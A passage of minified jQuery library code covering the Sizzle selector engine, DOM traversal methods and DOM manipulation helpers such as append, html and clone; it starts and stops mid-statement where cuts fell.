dj&&dj.value===dg}}}co.find.TAG=c8.tagNameNoComments?function(dh,dg){if(typeof dg.getElementsByTagName!==c7){return dg.getElementsByTagName(dh)}}:function(dk,dg){var dh,dl=[],di=0,dj=dg.getElementsByTagName(dk);if(dk==="*"){for(;(dh=dj[di]);di++){if(dh.nodeType===1){dl.push(dh)}}return dl}return dj};co.find.NAME=c8.getByName&&function(dh,dg){if(typeof dg.getElementsByName!==c7){return dg.getElementsByName(name)}};co.find.CLASS=c8.getByClassName&&function(dg,dh){if(typeof dh.getElementsByClassName!==c7&&!cj){return dh.getElementsByClassName(dg)}};cL=[];cM=[":focus"];if((c8.qsa=cv(e.querySelectorAll))){b3(function(dg){dg.innerHTML="<select><option selected=''></option></select>";if(!dg.querySelectorAll("[selected]").length){cM.push("\\["+dd+"*(?:checked|disabled|ismap|multiple|readonly|selected|value)")}if(!dg.querySelectorAll(":checked").length){cM.push(":checked")}});b3(function(dg){dg.innerHTML="<input type='hidden' i=''/>";if(dg.querySelectorAll("[i^='']").length){cM.push("[*^$]="+dd+"*(?:\"\"|'')")}if(!dg.querySelectorAll(":enabled").length){cM.push(":enabled",":disabled")}dg.querySelectorAll("*,:x");cM.push(",.*:")})}if((c8.matchesSelector=cv((cA=ch.matchesSelector||ch.mozMatchesSelector||ch.webkitMatchesSelector||ch.oMatchesSelector||ch.msMatchesSelector)))){b3(function(dg){c8.disconnectedMatch=cA.call(dg,"div");cA.call(dg,"[s!='']:x");cL.push("!=",cI)})}cM=new RegExp(cM.join("|"));cL=new RegExp(cL.join("|"));cb=cv(ch.contains)||ch.compareDocumentPosition?function(dg,di){var dh=dg.nodeType===9?dg.documentElement:dg,dj=di&&di.parentNode;return dg===dj||!!(dj&&dj.nodeType===1&&(dh.contains?dh.contains(dj):dg.compareDocumentPosition&&dg.compareDocumentPosition(dj)&16))}:function(dg,dh){if(dh){while((dh=dh.parentNode)){if(dh===dg){return true}}}return false};c6=ch.compareDocumentPosition?function(dg,dh){var di;if(dg===dh){cr=true;return 0}if((di=dh.compareDocumentPosition&&dg.compareDocumentPosition&&dg.compareDocumentPosition(dh))){if(di&1||dg.parentNode&&dg.parentNode.nodeType===11){if(dg===e||cb(cH,dg)){return -1}if(dh===e||cb(cH,dh)){return 1}return 0}return di&4?-1:1}return dg.compareDocumentPosition?-1:1}:function(dg,dj){var dm,dn=0,di=dg.parentNode,dl=dj.parentNode,dh=[dg],dk=[dj];if(dg===dj){cr=true;return 0}else{if(dg.sourceIndex&&dj.sourceIndex){return(~dj.sourceIndex||cC)-(cb(cH,dg)&&~dg.sourceIndex||cC)}else{if(!di||!dl){return dg===e?-1:dj===e?1:di?-1:dl?1:0}else{if(di===dl){return c3(dg,dj)}}}}dm=dg;while((dm=dm.parentNode)){dh.unshift(dm)}dm=dj;while((dm=dm.parentNode)){dk.unshift(dm)}while(dh[dn]===dk[dn]){dn++}return dn?c3(dh[dn],dk[dn]):dh[dn]===cH?-1:dk[dn]===cH?1:0};cr=false;[0,0].sort(c6);c8.detectDuplicates=cr;return ci};c4.matches=function(df,e){return c4(df,null,null,e)};c4.matchesSelector=function(dg,dh){if((dg.ownerDocument||dg)!==ci){c0(dg)}dh=dh.replace(cK,"='$1']");if(c8.matchesSelector&&!cj&&(!cL||!cL.test(dh))&&!cM.test(dh)){try{var di=cA.call(dg,dh);if(di||c8.disconnectedMatch||dg.document&&dg.document.nodeType!==11){return di}}catch(df){}}return c4(dh,ci,null,[dg]).length>0};c4.contains=function(e,df){if((e.ownerDocument||e)!==ci){c0(e)}return cb(e,df)};c4.attr=function(e,df){var dg;if((e.ownerDocument||e)!==ci){c0(e)}if(!cj){df=df.toLowerCase()}if((dg=co.attrHandle[df])){return dg(e)}if(cj||c8.attributes){return e.getAttribute(df)}return((dg=e.getAttributeNode(df))||e.getAttribute(df))&&e[df]===true?df:dg&&dg.specified?dg.value:null};c4.error=function(e){throw new Error("Syntax error, unrecognized expression: "+e)};c4.uniqueSort=function(di){var df,e=[],dg=1,dh=0;cr=!c8.detectDuplicates;di.sort(c6);if(cr){for(;(df=di[dg]);dg++){if(df===di[dg-1]){dh=e.push(dg)}}while(dh--){di.splice(e[dh],1)}}return di};function c3(e,df){var dg=e&&df&&e.nextSibling;for(;dg;dg=dg.nextSibling){if(dg===df){return -1}}return e?1:-1}function ce(e){return function(df){var dg=df.nodeName.toLowerCase();return dg==="input"&&df.type===e}}function cc(e){return function(df){var dg=df.nodeName.toLowerCase();return(dg==="input"||dg==="button")&&df.type===e}}function cf(e){return cx(function(df){df=+df;return cx(function(dk,di){var dh,dj=e([],dk.length,df),dg=dj.length;while(dg--){if(dk[(dh=dj[dg])]){dk[dh]=!(di[dh]=dk[dh])}}})})}cq=c4.getText=function(e){var dg,di="",df=0,dh=e.nodeType;if(!dh){for(;(dg=e[df]);df++){di+=cq(dg)}}else{if(dh===1||dh===9||dh===11){if(typeof e.textContent==="string"){return e.textContent}else{for(e=e.firstChild;e;e=e.nextSibling){di+=cq(e)}}}else{if(dh===3||dh===4){return e.nodeValue}}}return di};co=c4.selectors={cacheLength:50,createPseudo:cx,match:cB,find:{},relative:{">":{dir:"parentNode",first:true}," ":{dir:"parentNode"},"+":{dir:"previousSibling",first:true},"~":{dir:"previousSibling"}},preFilter:{ATTR:function(e){e[1]=e[1].replace(cY,cp);e[3]=(e[4]||e[5]||"").replace(cY,cp);if(e[2]==="~="){e[3]=" "+e[3]+" "}return e.slice(0,4)},CHILD:function(e){e[1]=e[1].toLowerCase();if(e[1].slice(0,3)==="nth"){if(!e[3]){c4.error(e[0])}e[4]=+(e[4]?e[5]+(e[6]||1):2*(e[3]==="even"||e[3]==="odd"));e[5]=+((e[7]+e[8])||e[3]==="odd")}else{if(e[3]){c4.error(e[0])}}return e},PSEUDO:function(df){var e,dg=!df[5]&&df[2];if(cB.CHILD.test(df[0])){return null}if(df[4]){df[2]=df[4]}else{if(dg&&cU.test(dg)&&(e=da(dg,true))&&(e=dg.indexOf(")",dg.length-e)-dg.length)){df[0]=df[0].slice(0,e);df[2]=dg.slice(0,e)}}return df.slice(0,3)}},filter:{TAG:function(e){if(e==="*"){return function(){return true}}e=e.replace(cY,cp).toLowerCase();return function(df){return df.nodeName&&df.nodeName.toLowerCase()===e}},CLASS:function(e){var df=b7[e+" "];return df||(df=new RegExp("(^|"+dd+")"+e+"("+dd+"|$)"))&&b7(e,function(dg){return df.test(dg.className||(typeof dg.getAttribute!==c7&&dg.getAttribute("class"))||"")})},ATTR:function(df,dg,e){return function(dh){var di=c4.attr(dh,df);if(di==null){return dg==="!="}if(!dg){return true}di+="";return dg==="="?di===e:dg==="!="?di!==e:dg==="^="?e&&di.indexOf(e)===0:dg==="*="?e&&di.indexOf(e)>-1:dg==="$="?e&&di.substr(di.length-e.length)===e:dg==="~="?(" "+di+" ").indexOf(e)>-1:dg==="|="?di===e||di.substr(0,e.length+1)===e+"-":false}},CHILD:function(dk,dl,e,df,dh){var dj=dk.slice(0,3)!=="nth",dg=dk.slice(-4)!=="last",di=dl==="of-type";return df===1&&dh===0?function(dm){return !!dm.parentNode}:function(dr,dn,dz){var dm,dv,dt,dp,du,dx,dq=dj!==dg?"nextSibling":"previousSibling",dw=dr.parentNode,ds=di&&dr.nodeName.toLowerCase(),dy=!dz&&!di;if(dw){if(dj){while(dq){dt=dr;while((dt=dt[dq])){if(di?dt.nodeName.toLowerCase()===ds:dt.nodeType===1){return false}}dx=dq=dk==="only"&&!dx&&"nextSibling"}return true}dx=[dg?dw.firstChild:dw.lastChild];if(dg&&dy){dv=dw[cn]||(dw[cn]={});dm=dv[dk]||[];du=dm[0]===cg&&dm[1];dp=dm[0]===cg&&dm[2];dt=du&&dw.childNodes[du];while((dt=++du&&dt&&dt[dq]||(dp=du=0)||dx.pop())){if(dt.nodeType===1&&++dp&&dt===dr){dv[dk]=[cg,du,dp];break}}}else{if(dy&&(dm=(dr[cn]||(dr[cn]={}))[dk])&&dm[0]===cg){dp=dm[1]}else{while((dt=++du&&dt&&dt[dq]||(dp=du=0)||dx.pop())){if((di?dt.nodeName.toLowerCase()===ds:dt.nodeType===1)&&++dp){if(dy){(dt[cn]||(dt[cn]={}))[dk]=[cg,dp]}if(dt===dr){break}}}}}dp-=dh;return dp===df||(dp%df===0&&dp/df>=0)}}},PSEUDO:function(dh,df){var e,dg=co.pseudos[dh]||co.setFilters[dh.toLowerCase()]||c4.error("unsupported pseudo: "+dh);if(dg[cn]){return dg(df)}if(dg.length>1){e=[dh,dh,"",df];return co.setFilters.hasOwnProperty(dh.toLowerCase())?cx(function(dm,dl){var dj,dk=dg(dm,df),di=dk.length;while(di--){dj=cu.call(dm,dk[di]);dm[dj]=!(dl[dj]=dk[di])}}):function(di){return dg(di,0,e)}}return dg}},pseudos:{not:cx(function(dh){var e=[],dg=[],df=b8(dh.replace(cX,"$1"));return df[cn]?cx(function(dm,dl,di,dp){var dj,dn=df(dm,null,dp,[]),dk=dm.length;while(dk--){if((dj=dn[dk])){dm[dk]=!(dl[dk]=dj)}}}):function(dj,di,dk){e[0]=dj;df(e,null,dk,dg);return !dg.pop()}}),has:cx(function(e){return function(df){return c4(e,df).length>0}}),contains:cx(function(e){return function(df){return(df.textContent||df.innerText||cq(df)).indexOf(e)>-1}}),lang:cx(function(e){if(!cR.test(e||"")){c4.error("unsupported lang: "+e)}e=e.replace(cY,cp).toLowerCase();return function(df){var dg;do{if((dg=cj?df.getAttribute("xml:lang")||df.getAttribute("lang"):df.lang)){dg=dg.toLowerCase();return dg===e||dg.indexOf(e+"-")===0}}while((df=df.parentNode)&&df.nodeType===1);return false}}),target:function(e){var df=de.location&&de.location.hash;return df&&df.slice(1)===e.id},root:function(e){return e===ch},focus:function(e){return e===ci.activeElement&&(!ci.hasFocus||ci.hasFocus())&&!!(e.type||e.href||~e.tabIndex)},enabled:function(e){return e.disabled===false},disabled:function(e){return e.disabled===true},checked:function(e){var df=e.nodeName.toLowerCase();return(df==="input"&&!!e.checked)||(df==="option"&&!!e.selected)},selected:function(e){if(e.parentNode){e.parentNode.selectedIndex}return e.selected===true},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling){if(e.nodeName>"@"||e.nodeType===3||e.nodeType===4){return false}}return true},parent:function(e){return !co.pseudos.empty(e)},header:function(e){return cQ.test(e.nodeName)},input:function(e){return cS.test(e.nodeName)},button:function(e){var df=e.nodeName.toLowerCase();return df==="input"&&e.type==="button"||df==="button"},text:function(df){var e;return df.nodeName.toLowerCase()==="input"&&df.type==="text"&&((e=df.getAttribute("type"))==null||e.toLowerCase()===df.type)},first:cf(function(){return[0]}),last:cf(function(df,e){return[e-1]}),eq:cf(function(dg,df,e){return[e<0?e+df:e]}),even:cf(function(dg,df){var e=0;for(;e<df;e+=2){dg.push(e)}return dg}),odd:cf(function(dg,df){var e=1;for(;e<df;e+=2){dg.push(e)}return dg}),lt:cf(function(dh,dg,e){var df=e<0?e+dg:e;for(;--df>=0;){dh.push(df)}return dh}),gt:cf(function(dh,dg,e){var df=e<0?e+dg:e;for(;++df<dg;){dh.push(df)}return dh})}};for(cs in {radio:true,checkbox:true,file:true,password:true,image:true}){co.pseudos[cs]=ce(cs)}for(cs in {submit:true,reset:true}){co.pseudos[cs]=cc(cs)}function da(dk,di){var dh,dg,dm,dn,dl,df,dj,e=c9[dk+" "];if(e){return di?0:e.slice(0)}dl=dk;df=[];dj=co.preFilter;while(dl){if(!dh||(dg=cO.exec(dl))){if(dg){dl=dl.slice(dg[0].length)||dl}df.push(dm=[])}dh=false;if((dg=cN.exec(dl))){dh=dg.shift();dm.push({value:dh,type:dg[0].replace(cX," ")});dl=dl.slice(dh.length)}for(dn in co.filter){if((dg=cB[dn].exec(dl))&&(!dj[dn]||(dg=dj[dn](dg)))){dh=dg.shift();dm.push({value:dh,type:dn,matches:dg});dl=dl.slice(dh.length)}}if(!dh){break}}return di?dl.length:dl?c4.error(dk):c9(dk,df).slice(0)}function db(dh){var e=0,df=dh.length,dg="";for(;e<df;e++){dg+=dh[e].value}return dg}function b1(dj,dg,e){var dh=dg.dir,df=e&&dg.dir==="parentNode",di=ck++;return dg.first?function(dl,dk,dm){while((dl=dl[dh])){if(dl.nodeType===1||df){return dj(dl,dk,dm)}}}:function(dp,dl,dr){var dm,dk,dq,dn=cg+" "+di;if(dr){while((dp=dp[dh])){if(dp.nodeType===1||df){if(dj(dp,dl,dr)){return true}}}}else{while((dp=dp[dh])){if(dp.nodeType===1||df){dq=dp[cn]||(dp[cn]={});if((dk=dq[dh])&&dk[0]===dn){if((dm=dk[1])===true||dm===b5){return dm===true}}else{dk=dq[dh]=[dn];dk[1]=dj(dp,dl,dr)||b5;if(dk[1]===true){return true}}}}}}}function cm(e){return e.length>1?function(dg,df,di){var dh=e.length;while(dh--){if(!e[dh](dg,df,di)){return false}}return true}:e[0]}function ca(dm,dj,dg,e,dn){var df,dl=[],dh=0,di=dm.length,dk=dj!=null;for(;dh<di;dh++){if((df=dm[dh])){if(!dg||dg(df,e,dn)){dl.push(df);if(dk){dj.push(dh)}}}}return dl}function c2(di,dj,e,df,dg,dh){if(df&&!df[cn]){df=c2(df)}if(dg&&!dg[cn]){dg=c2(dg,dh)}return cx(function(dv,du,dk,dx){var dw,dn,dl,dt=[],dr=[],ds=du.length,dm=dv||cD(dj||"*",dk.nodeType?[dk]:dk,[]),dp=di&&(dv||!dj)?ca(dm,dt,di,dk,dx):dm,dq=e?dg||(dv?di:ds||df)?[]:du:dp;if(e){e(dp,dq,dk,dx)}if(df){dw=ca(dq,dr);df(dw,[],dk,dx);dn=dw.length;while(dn--){if((dl=dw[dn])){dq[dr[dn]]=!(dp[dr[dn]]=dl)}}}if(dv){if(dg||di){if(dg){dw=[];dn=dq.length;while(dn--){if((dl=dq[dn])){dw.push((dp[dn]=dl))}}dg(null,(dq=[]),dw,dx)}dn=dq.length;while(dn--){if((dl=dq[dn])&&(dw=dg?cu.call(dv,dl):dt[dn])>-1){dv[dw]=!(du[dw]=dl)}}}}else{dq=ca(dq===du?dq.splice(ds,dq.length):dq);if(dg){dg(null,du,dq,dx)}else{cJ.apply(du,dq)}}})}function cz(dp){var e,dm,dh,dj=dp.length,di=co.relative[dp[0].type],dg=di||co.relative[" "],df=di?1:0,dl=b1(function(dq){return dq===e},dg,true),dk=b1(function(dq){return cu.call(e,dq)>-1},dg,true),dn=[function(dr,dq,ds){return(!di&&(ds||dq!==cF))||((e=dq).nodeType?dl(dr,dq,ds):dk(dr,dq,ds))}];for(;df<dj;df++){if((dm=co.relative[dp[df].type])){dn=[b1(cm(dn),dm)]}else{dm=co.filter[dp[df].type].apply(null,dp[df].matches);if(dm[cn]){dh=++df;for(;dh<dj;dh++){if(co.relative[dp[dh].type]){break}}return c2(df>1&&cm(dn),df>1&&db(dp.slice(0,df-1)).replace(cX,"$1"),dm,df<dh&&cz(dp.slice(df,dh)),dh<dj&&cz((dp=dp.slice(dh))),dh<dj&&db(dp))}dn.push(dm)}}return cm(dn)}function cy(dg,di){var dh=0,df=di.length>0,e=dg.length>0,dj=function(dx,dk,dA,dw,dq){var dn,ds,du,dy=[],dt=0,dr="0",dz=dx&&[],dv=dq!=null,dl=cF,dp=dx||e&&co.find.TAG("*",dq&&dk.parentNode||dk),dm=(cg+=dl==null?1:Math.E);if(dv){cF=dk!==ci&&dk;b5=dh}for(;(dn=dp[dr])!=null;dr++){if(e&&dn){for(ds=0;(du=dg[ds]);ds++){if(du(dn,dk,dA)){dw.push(dn);break}}if(dv){cg=dm;b5=++dh}}if(df){if((dn=!du&&dn)){dt--}if(dx){dz.push(dn)}}}dt+=dr;if(df&&dr!==dt){for(ds=0;(du=di[ds]);ds++){du(dz,dy,dk,dA)}if(dx){if(dt>0){while(dr--){if(!(dz[dr]||dy[dr])){dy[dr]=cG.call(dw)}}}dy=ca(dy)}cJ.apply(dw,dy);if(dv&&!dx&&dy.length>0&&(dt+di.length)>1){c4.uniqueSort(dw)}}if(dv){cg=dm;cF=dl}return dz};return df?cx(dj):dj}b8=c4.compile=function(di,dg){var dh,dj=[],df=[],e=b9[di+" "];if(!e){if(!dg){dg=da(di)}dh=dg.length;while(dh--){e=cz(dg[dh]);if(e[cn]){dj.push(e)}else{df.push(e)}}e=b9(di,cy(df,dj))}return e};function cD(di,e,dh){var df=0,dg=e.length;for(;df<dg;df++){c4(di,e[df],dh)}return dh}function cZ(dk,e,di,dj){var dg,dm,dl,dn,df,dh=da(dk);if(!dj){if(dh.length===1){dm=dh[0]=dh[0].slice(0);if(dm.length>2&&(dl=dm[0]).type==="ID"&&e.nodeType===9&&!cj&&co.relative[dm[1].type]){e=co.find.ID(dl.matches[0].replace(cY,cp),e)[0];if(!e){return di}dk=dk.slice(dm.shift().value.length)}for(dg=cB.needsContext.test(dk)?-1:dm.length-1;dg>=0;dg--){dl=dm[dg];if(co.relative[(dn=dl.type)]){break}if((df=co.find[dn])){if((dj=df(dl.matches[0].replace(cY,cp),cW.test(dm[0].type)&&e.parentNode||e))){dm.splice(dg,1);dk=dj.length&&db(dm);if(!dk){cJ.apply(di,c5.call(dj,0));return di}break}}}}}b8(dk,dh)(dj,e,cj,di,cW.test(dk));return di}co.pseudos.nth=co.pseudos.eq;function c1(){}co.filters=c1.prototype=co.pseudos;co.setFilters=new c1();c0();c4.attr=aw.attr;aw.find=c4;aw.expr=c4.selectors;aw.expr[":"]=aw.expr.pseudos;aw.unique=c4.uniqueSort;aw.text=c4.getText;aw.isXMLDoc=c4.isXML;aw.contains=c4.contains})(bU);var bB=/Until$/,bk=/^(?:parents|prev(?:Until|All))/,av=/^.[^:#\[\.,]*$/,bc=aw.expr.match.needsContext,am={children:true,contents:true,next:true,prev:true};aw.fn.extend({find:function(b2){var e,b1,b3;if(typeof b2!=="string"){b3=this;return this.pushStack(aw(b2).filter(function(){for(e=0;e<b3.length;e++){if(aw.contains(b3[e],this)){return true}}}))}b1=[];for(e=0;e<this.length;e++){aw.find(b2,this[e],b1)}b1=this.pushStack(aw.unique(b1));b1.selector=(this.selector?this.selector+" ":"")+b2;return b1},has:function(b2){var e,b3=aw(b2,this),b1=b3.length;return this.filter(function(){for(e=0;e<b1;e++){if(aw.contains(this,b3[e])){return true}}})},not:function(e){return this.pushStack(bV(this,e,false))},filter:function(e){return this.pushStack(bV(this,e,true))},is:function(e){return !!e&&(typeof e==="string"?bc.test(e)?aw(e,this.context).index(this[0])>=0:aw.filter(e,this).length>0:this.filter(e).length>0)},closest:function(b6,e){var b1,b2=0,b3=this.length,b5=[],b4=bc.test(b6)||typeof b6!=="string"?aw(b6,e||this.context):0;for(;b2<b3;b2++){b1=this[b2];while(b1&&b1.ownerDocument&&b1!==e&&b1.nodeType!==11){if(b4?b4.index(b1)>-1:aw.find.matchesSelector(b1,b6)){b5.push(b1);break}b1=b1.parentNode}}return this.pushStack(b5.length>1?aw.unique(b5):b5)},index:function(e){if(!e){return(this[0]&&this[0].parentNode)?this.first().prevAll().length:-1}if(typeof e==="string"){return aw.inArray(this[0],aw(e))}return aw.inArray(e.jquery?e[0]:e,this)},add:function(b2,b1){var b3=typeof b2==="string"?aw(b2,b1):aw.makeArray(b2&&b2.nodeType?[b2]:b2),e=aw.merge(this.get(),b3);return this.pushStack(aw.unique(e))},addBack:function(e){return this.add(e==null?this.prevObject:this.prevObject.filter(e))}});aw.fn.andSelf=aw.fn.addBack;function bN(e,b1){do{e=e[b1]}while(e&&e.nodeType!==1);return e}aw.each({parent:function(e){var b1=e.parentNode;return b1&&b1.nodeType!==11?b1:null},parents:function(e){return aw.dir(e,"parentNode")},parentsUntil:function(e,b1,b2){return aw.dir(e,"parentNode",b2)},next:function(e){return bN(e,"nextSibling")},prev:function(e){return bN(e,"previousSibling")},nextAll:function(e){return aw.dir(e,"nextSibling")},prevAll:function(e){return aw.dir(e,"previousSibling")},nextUntil:function(e,b1,b2){return aw.dir(e,"nextSibling",b2)},prevUntil:function(e,b1,b2){return aw.dir(e,"previousSibling",b2)},siblings:function(e){return aw.sibling((e.parentNode||{}).firstChild,e)},children:function(e){return aw.sibling(e.firstChild)},contents:function(e){return aw.nodeName(e,"iframe")?e.contentDocument||e.contentWindow.document:aw.merge([],e.childNodes)}},function(b1,e){aw.fn[b1]=function(b4,b3){var b2=aw.map(this,e,b4);if(!bB.test(b1)){b3=b4}if(b3&&typeof b3==="string"){b2=aw.filter(b3,b2)}b2=this.length>1&&!am[b1]?aw.unique(b2):b2;if(this.length>1&&bk.test(b1)){b2=b2.reverse()}return this.pushStack(b2)}});aw.extend({filter:function(b1,e,b2){if(b2){b1=":not("+b1+")"}return e.length===1?aw.find.matchesSelector(e[0],b1)?[e[0]]:[]:aw.find.matches(b1,e)},dir:function(b2,b1,b4){var b3=[],e=b2[b1];while(e&&e.nodeType!==9&&(b4===bS||e.nodeType!==1||!aw(e).is(b4))){if(e.nodeType===1){b3.push(e)}e=e[b1]}return b3},sibling:function(b1,e){var b2=[];for(;b1;b1=b1.nextSibling){if(b1.nodeType===1&&b1!==e){b2.push(b1)}}return b2}});function bV(e,b3,b2){b3=b3||0;if(aw.isFunction(b3)){return aw.grep(e,function(b4,b5){var b6=!!b3.call(b4,b5,b4);return b6===b2})}else{if(b3.nodeType){return aw.grep(e,function(b4){return(b4===b3)===b2})}else{if(typeof b3==="string"){var b1=aw.grep(e,function(b4){return b4.nodeType===1});if(av.test(b3)){return aw.filter(b3,b1,!b2)}else{b3=aw.filter(b3,b1)}}}}return aw.grep(e,function(b4){return(aw.inArray(b4,b3)>=0)===b2})}function J(e){var b1=aA.split("|"),b2=e.createDocumentFragment();if(b2.createElement){while(b1.length){b2.createElement(b1.pop())}}return b2}var aA="abbr|article|aside|audio|bdi|canvas|data|datalist|details|figcaption|figure|footer|header|hgroup|mark|meter|nav|output|progress|section|summary|time|video",a3=/ jQuery\d+="(?:null|\d+)"/g,bf=new RegExp("<(?:"+aA+")[\\s/>]","i"),a6=/^\s+/,bI=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,bw=/<([\w:]+)/,bx=/<tbody/i,a2=/<|&#?\w+;/,be=/<(?:script|style|link)/i,ay=/^(?:checkbox|radio)$/i,aK=/checked\s*(?:[^=]|=\s*.checked.)/i,br=/^$|\/(?:java|ecma)script/i,bs=/^true\/(.*)/,aM=/^\s*<!(?:\[CDATA\[|--)|(?:\]\]|--)>\s*$/g,bW={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],area:[1,"<map>","</map>"],param:[1,"<object>","</object>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:aw.support.htmlSerialize?[0,"",""]:[1,"X<div>","</div>"]},bJ=J(V),ad=bJ.appendChild(V.createElement("div"));bW.optgroup=bW.option;bW.tbody=bW.tfoot=bW.colgroup=bW.caption=bW.thead;bW.th=bW.td;aw.fn.extend({text:function(e){return aw.access(this,function(b1){return b1===bS?aw.text(this):this.empty().append((this[0]&&this[0].ownerDocument||V).createTextNode(b1))},null,e,arguments.length)},wrapAll:function(e){if(aw.isFunction(e)){return this.each(function(b2){aw(this).wrapAll(e.call(this,b2))})}if(this[0]){var b1=aw(e,this[0].ownerDocument).eq(0).clone(true);if(this[0].parentNode){b1.insertBefore(this[0])}b1.map(function(){var b2=this;while(b2.firstChild&&b2.firstChild.nodeType===1){b2=b2.firstChild}return b2}).append(this)}return this},wrapInner:function(e){if(aw.isFunction(e)){return this.each(function(b1){aw(this).wrapInner(e.call(this,b1))})}return this.each(function(){var b2=aw(this),b1=b2.contents();if(b1.length){b1.wrapAll(e)}else{b2.append(e)}})},wrap:function(e){var b1=aw.isFunction(e);return this.each(function(b2){aw(this).wrapAll(b1?e.call(this,b2):e)})},unwrap:function(){return this.parent().each(function(){if(!aw.nodeName(this,"body")){aw(this).replaceWith(this.childNodes)}}).end()},append:function(){return this.domManip(arguments,true,function(e){if(this.nodeType===1||this.nodeType===11||this.nodeType===9){this.appendChild(e)}})},prepend:function(){return this.domManip(arguments,true,function(e){if(this.nodeType===1||this.nodeType===11||this.nodeType===9){this.insertBefore(e,this.firstChild)}})},before:function(){return this.domManip(arguments,false,function(e){if(this.parentNode){this.parentNode.insertBefore(e,this)}})},after:function(){return this.domManip(arguments,false,function(e){if(this.parentNode){this.parentNode.insertBefore(e,this.nextSibling)}})},remove:function(b3,b2){var e,b1=0;for(;(e=this[b1])!=null;b1++){if(!b3||aw.filter(b3,[e]).length>0){if(!b2&&e.nodeType===1){aw.cleanData(ag(e))}if(e.parentNode){if(b2&&aw.contains(e.ownerDocument,e)){bK(ag(e,"script"))}e.parentNode.removeChild(e)}}}return this},empty:function(){var e,b1=0;for(;(e=this[b1])!=null;b1++){if(e.nodeType===1){aw.cleanData(ag(e,false))}while(e.firstChild){e.removeChild(e.firstChild)}if(e.options&&aw.nodeName(e,"select")){e.options.length=0}}return this},clone:function(e,b1){e=e==null?false:e;b1=b1==null?e:b1;return this.map(function(){return aw.clone(this,e,b1)})},html:function(e){return aw.access(this,function(b5){var b2=this[0]||{},b3=0,b4=this.length;if(b5===bS){return b2.nodeType===1?b2.innerHTML.replace(a3,""):bS}if(typeof b5==="string"&&!be.test(b5)&&(aw.support.htmlSerialize||!bf.test(b5))&&(aw.support.leadingWhitespace||!a6.test(b5))&&!bW[(bw.exec(b5)||["",""])[1].toLowerCase()]){b5=b5.replace(bI,"<$1></$2>");try{for(;b3<b4;b3++){b2=this[b3]||{};if(b2.nodeType===1){aw.cleanData(ag(b2,false));b2.innerHTML=b5}}b2=0}catch(b1){}}if(b2){this.empty().append(b5)}},null,e,arguments.length)},replaceWith:function(b1){var e=aw.isFunction(b1);if(!e&&typeof b1!=="string"){b1=aw(b1).not(this).detach()}return this.domManip([b1],true,function(b2){var b3=this.nextSibling,b4=this.parentNode;if(b4&&this.nodeType===1||this.nodeType===11){aw(this).remove();if(b3){b3.parentNode.insertBefore(b2,b3)}else{b4.appendChild(b2)}}})},detach:function(e){return this.remove(e,true)},domManip:function(e,cd,b1){e=v.apply([],e);var b4,b3,cb,b5,ca,b2,b6=0,b9=this.length,cc=this,b7=b9-1,ce=e[0],b8=aw.isFunction(ce);if(b8||!(b9<=1||typeof ce!=="string"||aw.support.checkClone||!aK.test(ce))){return this.each(function(cf){var cg=cc.eq(cf);if(b8){e[0]=ce.call(this,cf,cd?cg.html():bS)}cg.domManip(e,cd,b1)})}if(b9){b4=aw.buildFragment(e,this[0].ownerDocument,false,this);b3=b4.firstChild;if(b4.childNodes.length===1){b4=b3}if(b3){cd=cd&&aw.nodeName(b3,"tr");cb=aw.map(ag(b4,"script"),U);b5=cb.length;for(;b6<b9;b6++){ca=b4;if(b6!==b7){ca=aw.clone(ca,true,true);if(b5){aw.merge(cb,ag(ca,"script"))}}b1.call(cd&&aw.nodeName(this[b6],"table")?aa(this[b6],"tbody"):this[b6],ca,b6)}if(b5){b2=cb[cb.length-1].ownerDocument;aw.map(cb,aS);for(b6=0;b6<b5;b6++){ca=cb[b6];if(br.test(ca.type||"")&&!aw._data(ca,"globalEval")&&aw.contains(b2,ca)){if(ca.src){aw.ajax({url:ca.src,type:"GET",dataType:"script",async:false,global:false,"throws":true})}else{aw.globalEval((ca.text||ca.textContent||ca.innerHTML||"").replace(aM,""))}}}}b4=b3=null}}return this}});function aa(e,b1){return e.getElementsByTagName(b1)[0]||e.appendChild(e.ownerDocument.createElement(b1))}function U(b1){var e=b1.getAttributeNode("type");b1.type=(e&&e.specified)+"/"+b1.type;return b1}function aS(e){var b1=bs.exec(e.type);if(b1){e.type=b1[1]}else{e.removeAttribute("type")}return e}function bK(b1,b3){var e,b2=0;for(;(e=b1[b2])!=null;b2++){aw._data(e,"globalEval",!b3||aw._data(b3[b2],"globalEval"))}}function u(b6,b1){if(b1.nodeType!==1||!aw.hasData(b6)){return}var b7,b3,b4,b5=aw._data(b6),e=aw._data(b1,b5),b2=b5.events;if(b2){delete e.handle;e.events={};for(b7 in b2){for(b3=0,b4=b2[b7].length;b3<b4;b3++){aw.event.add(b1,b7,b2[b7][b3])}}}if(e.data){e.data=aw.extend({},e.data)}}function ab(b5,b2){var b4,b1,b3;if(b2.nodeType!==1){return}b4=b2.nodeName.toLowerCase();if(!aw.support.noCloneEvent&&b2[aw.expando]){b1=aw._data(b2);for(b3 in b1.events){aw.removeEvent(b2,b3,b1.handle)}b2.removeAttribute(aw.expando)}if(b4==="script"&&b2.text!==b5.text){U(b2).text=b5.text;aS(b2)}else{if(b4==="object"){if(b2.parentNode){b2.outerHTML=b5.outerHTML}if(aw.support.html5Clone&&(b5.innerHTML&&!aw.trim(b2.innerHTML))){b2.innerHTML=b5.innerHTML}}else{if(b4==="input"&&ay.test(b5.type)){b2.defaultChecked=b2.checked=b5.checked;if(b2.value!==b5.value){b2.value=b5.value}}else{if(b4==="option"){b2.defaultSelected=b2.selected=b5.defaultSelected}else{if(b4==="input"||b4==="textarea"){b2.defaultValue=b5.defaultValue}}}}}}aw.each({appendTo:"append",prependTo:"prepend",insertBefore:"before",insertAfter:"after",replaceAll:"replaceWith"},function(e,b1){aw.fn[e]=function(b7){var b2,b3=0,b6=[],b4=aw(b7),b5=b4.length-1;for(;b3<=b5;b3++){b2=b3===b5?this:this.clone(true);aw(b4[b3])[b1](b2);A.apply(b6,b2.get())}return this.pushStack(b6)}});function ag(e,b5){var b2,b1,b4=0,b3=typeof e.getElementsByTagName!=="undefined"?e.getElementsByTagName(b5||"*"):typeof 